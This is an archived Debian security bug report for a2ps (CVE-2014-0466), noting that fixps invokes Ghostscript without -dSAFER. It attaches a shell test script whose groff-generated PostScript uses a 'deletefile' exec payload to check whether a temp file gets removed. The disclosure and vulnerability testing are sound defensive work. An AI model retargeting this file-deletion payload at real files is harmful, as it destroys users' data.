[Secure-testing-team] Bug#742902: a2ps: CVE-2014-0466: does not invoke gs with -dSAFER

brian m. carlson sandals at crustytoothpaste.net
Fri Mar 28 20:03:36 UTC 2014 

Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security

fixps does not invoke gs with -dSAFER.  As a consequence, a malicious
PostScript file could delete files with the privileges of the invoking
user.

I have provided a test script that can be invoked as such:

  ./test-wrapper-fixps fixps

This was reported to the Debian Security Team, who assigned this
CVE-2014-0466.  It was also reported to upstream, who has not provided
an update or issued a fixed version.  This is being reported publicly as
over 45 days has elapsed and neither upstream nor the security team has
requested a delay or issued an advisory.

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages a2ps depends on:
ii  file       1:5.17-1
ii  libc6      2.18-4
ii  libpaper1  1.1.24+nmu2
ii  psutils    1.17.dfsg-1

Versions of packages a2ps recommends:
ii  bzip2           1.0.6-5
ii  cups-bsd [lpr]  1.7.1-10
ii  wdiff           1.2.1-2

Versions of packages a2ps suggests:
pn  emacsen-common                       <none>
ii  ghostscript                          9.05~dfsg-8+b1
ii  groff                                1.22.2-5
pn  gv                                   <none>
pn  html2ps                              <none>
ii  imagemagick                          8:6.7.7.10+dfsg-1
pn  t1-cyrillic                          <none>
ii  texlive-binaries [texlive-base-bin]  2013.20130729.30972-2+b2

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
-------------- next part --------------
#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2

TEMPDIR=`mktemp -d`

[ -n "$TEMPDIR" ] || exit 1

touch "$TEMPDIR/remove-me"
groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM

"$@" "$TEMPDIR/exploit.ps" >/dev/null

if [ -e "$TEMPDIR/remove-me" ]
then
	printf "Program is not vulnerable.\n"
else
	printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20140328/e8ddf305/attachment.sig>

More information about the Secure-testing-team mailing list